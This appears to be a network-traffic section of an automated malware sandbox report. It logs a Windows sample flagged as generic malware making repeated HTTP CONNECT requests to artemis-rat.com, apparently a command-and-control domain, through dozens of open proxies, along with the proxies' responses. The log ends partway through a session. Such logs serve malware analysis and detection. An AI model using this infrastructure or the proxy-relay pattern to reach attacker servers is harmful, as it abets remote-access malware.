                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.854151964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1238192.168.2.453859103.13.229.19331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.854298115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.217835903 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1239192.168.2.453911162.223.94.166807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.855052948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.136754036 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1240192.168.2.453863185.217.143.23807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.855638981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1241192.168.2.453148117.160.250.16380807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.867564917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.053992033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.771297932 CET221INHTTP/1.1 403 Access Denied
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Connection: close
                                              Cache-Control: no-store
                                              Content-Type: text/html
                                              Content-Language: en
                                              Content-Length: 43
                                              Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                              Data Ascii: You are not allowed to access the document.


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1242192.168.2.453385165.227.221.8380807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.893381119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:40.116296053 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1243192.168.2.45393867.201.33.10252837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.893923044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1244192.168.2.453904119.18.149.3480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.894454002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1245192.168.2.45397345.12.30.231807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.894922972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.049150944 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1246192.168.2.453968172.64.207.185807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.900244951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.061273098 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1247192.168.2.453914218.252.244.126807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.900783062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.203310013 CET340INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.2
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1248192.168.2.453920195.154.172.16131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.910675049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:23.162028074 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1249192.168.2.453999104.16.226.6807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.914777994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.069004059 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1250192.168.2.454011104.21.85.200807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.920280933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.074687958 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1251192.168.2.454003162.159.242.230807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.088309050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.250140905 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1252192.168.2.453958172.93.213.177807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.092273951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1253192.168.2.453948184.170.245.14841457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.092735052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1254192.168.2.45397038.162.5.18331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.093795061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.571979046 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1255192.168.2.453924139.224.64.19180817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.093810081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.422559023 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1256192.168.2.453928121.128.194.154807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.094835997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1257192.168.2.453929185.110.190.99807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.095310926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1258192.168.2.453352222.138.76.690027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.095485926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.163347006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.597263098 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1259192.168.2.452198195.178.33.8680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.095485926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.609021902 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1260192.168.2.45394334.92.12.21092387284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.095860958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.410725117 CET28INHTTP/1.1 502 Bad Gateway


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1261192.168.2.452181103.126.173.20110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.096597910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1262192.168.2.454042104.21.102.95807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.096604109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
